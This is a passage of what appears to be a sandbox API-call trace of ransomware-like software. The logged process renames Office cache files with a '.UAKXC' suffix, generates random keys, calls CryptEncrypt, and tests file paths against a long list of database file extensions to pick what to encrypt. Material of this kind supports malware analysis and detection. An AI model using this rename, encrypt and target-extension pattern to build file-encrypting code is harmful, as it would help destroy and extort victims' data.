(hObject=0x6ec) returned 1 [0158.093] GetProcessHeap () returned 0xea0000 [0158.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0158.093] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0158.093] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.UAKXC" [0158.093] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.uakxc")) returned 1 [0158.094] GetProcessHeap () returned 0xea0000 [0158.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0158.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5d58 | out: hHeap=0xea0000) returned 1 [0158.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef32d0 | out: hHeap=0xea0000) returned 1 [0158.094] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0158.094] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0158.094] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0158.095] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0158.095] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0158.095] GetLastError () returned 0x0 [0158.095] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=5884) returned 1 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0158.096] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0158.097] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0158.098] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0158.099] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0158.100] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0158.101] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All 